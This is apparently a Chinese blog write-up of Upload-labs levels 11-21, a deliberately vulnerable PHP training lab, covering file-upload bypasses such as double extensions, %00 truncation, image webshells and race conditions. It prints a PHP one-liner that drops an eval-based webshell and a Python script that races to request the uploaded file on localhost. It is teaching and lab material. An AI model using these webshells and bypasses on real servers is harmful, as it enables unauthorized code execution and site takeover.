IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> Upload-labs-文件上传(11-21) -> 正文阅读

[PHP知识库]Upload-labs-文件上传(11-21)

Pass-11-双写绕过

分析源码我们可以发现这里是将违规的后缀名全部替换成了空,但是他只替换一次,我们可以采用双写绕过。
在这里插入图片描述
在这里插入图片描述

Pass-12-get%00截断

%00截断的触发条件:
需要php版本<5.3.4,并且magic_quotes_gpc关闭
文件路径可控,比如我可以修改路径拼接的path,抓到的包中存在save_path: uploads/,就可以直接把路径构造成uploads/a.php%00
并将filename修改为a.png
在这里插入图片描述

蚁剑连接:

在这里插入图片描述

Pass-13-post%00截断

这一关白名单,文件上传路径拼接生成,而且使用了post发送的数据进行拼接,我们可以控制post数据进行0x00截断绕过白名单
POST不会对里面的数据自动解码,需要在Hex中修改。
这里我们先标注一下,+的在hex中显示的为2b
在这里插入图片描述
在hex中修改后:
在这里插入图片描述
可以上传成功了:
在这里插入图片描述
在这里插入图片描述

Pass-14-图片马

图片马的制作:
在这里插入图片描述
可以上传图片马,但我这里就直接burpsuite抓包,在文件头加上GIF89a,文件后缀改为gif,也可以上传成功。
在这里插入图片描述

直接访问并不能被解析,因此还需要利用文件包含漏洞:
在这里插入图片描述

蚁剑连接:
在这里插入图片描述

Pass-15-getimagesize()图片马

getimagesize :取得图像大小
在这里插入图片描述

这一关使用了getimagesize()来检查文件是否为图片,直接上传图片马,当然了也可以按照上一关的解法加GIF89a
在这里插入图片描述
可以进行文件包含:
在这里插入图片描述
蚁剑:
在这里插入图片描述

Pass-16-exif_imagetype()图片马

exif_imagetype :判断一个图像的类型

exif_imagetype()读取一个图像的第一个字节并检查其后缀名。
返回值与getimage()函数返回的索引2相同,但是速度比getimage快得多。

需要开启php_exif模块。
绕过方法同上!

Pass-17-二次渲染

这一关对上传图片进行了判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染,但是后端二次渲染需要找到渲染后的图片里面没有发生变化的Hex地方(本关多次尝试,可以在winhex下的文件前几行加入一句话木马),添加一句话,通过文件包含漏洞执行一句话,使用蚁剑进行连接.

我是用winhex打开之后在文件起始的地方加入了一句话木马,可以正常上传文件
在这里插入图片描述

文件包含:
在这里插入图片描述
然后用蚁剑连接成功!
在这里插入图片描述

Pass-18-条件竞争(一)

本关提示需要代码审计,我们看下代码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){	//先保存文件
        if(in_array($file_ext,$ext_arr)){	//判断后缀
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);	//合法改名
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);	//不合法删除
        }
    }else{
        $msg = '上传出错!';
    }
}

move_uploaded_file
(PHP 4 >= 4.0.3, PHP 5, PHP 7, PHP 8)

move_uploaded_file — 将上传的文件移动到新位置

说明 move_uploaded_file(string $filename, string $destination): bool
本函数检查并确保由 filename 指定的文件是合法的上传文件(即通过 PHP 的 HTTP POST
上传机制所上传的)。如果文件合法,则将其移动为由 destination 指定的文件。

先通过move_uploaded_file把文件保存了,然后再去判断后缀名是否合法,合法就重命名,如果不合法再删除。重是重点在于,在多线程情况下,就有可能出现还没处理完,我们就访问了原文件,这样就会导致被绕过防护。

1、使用burpsuite一直上传我们写好的文件a.php:

<?php fputs(fopen('stray.php','w'),'<?php @eval($_POST["stray"])?>');?>

在这里插入图片描述

在这里插入图片描述
2、另一边我们一直用脚本访问a.php文件,一旦可以访问到a.php,就会在文件夹下生成一句话木马文件:stray.php(也就是上面我自己写的那一句话)

import requests
url = "http://127.0.0.1/upload-labs-master/upload/a.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print("No")

3、当返回OK时就可以停掉burp了
在这里插入图片描述

但我并没有在文件夹下发现stray.php,也就是说我们a.php并没有被执行,stray.php也没有被创建,一直找不到原因。

去搜索了很多博客,照着别人的改,修改了a.php里边的内容:
多加了echo md5(1);,步骤和上面的一样用bp一直上传文件,另一边用脚本访问我们上传的a.php文件。然后就可以成功创建木马文件了,就很纳闷。。。。。。有没有大神讲解一下!

<?php echo md5(1);fputs(fopen('stray.php','w'),'<?php @eval($_POST[stray])?>');?>

此时upload下已经有了stray.php,也就是我们写的一句话木马
在这里插入图片描述
蚁剑连接,连接密码为stray:
在这里插入图片描述

Pass-19-条件竞争(二)

从源码来看的话,服务器先是将文件后缀跟白名单做了对比,然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。

这么看来的话,php是不能上传了,只能上传图片马了,而且需要在图片马没有被重命名之前访问它。要让图片马能够执行还要配合其他漏洞,比如文件包含,apache解析漏洞等。

这里还是将前一关的代码插入图片作出图片马。然后通过文件包含去访问该图片马。
在这里插入图片描述

然后我们要修改一下python脚本,不能再用回第18关的脚本了,这里脚本要修改为文件包含来访问
在这里插入图片描述
思路还是和上一关差不多,用bp一直上传文件,另一边运行我们的python脚本,不知道哪里出了问题,就是不能创建文件,先搁置!

Pass-20-%00截断

我们就直接上传一句话木马即可,修改后缀为png或者jpg,在upload-19.php后加上+用来当作标识,+在hex中表示为2b,然后将20修改为00
在这里插入图片描述
在这里插入图片描述
蚁剑连接成功!

在这里插入图片描述

Pass-21

随后补充!

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-01-28 11:40:17  更:2022-01-28 11:41:21 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:32:05-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码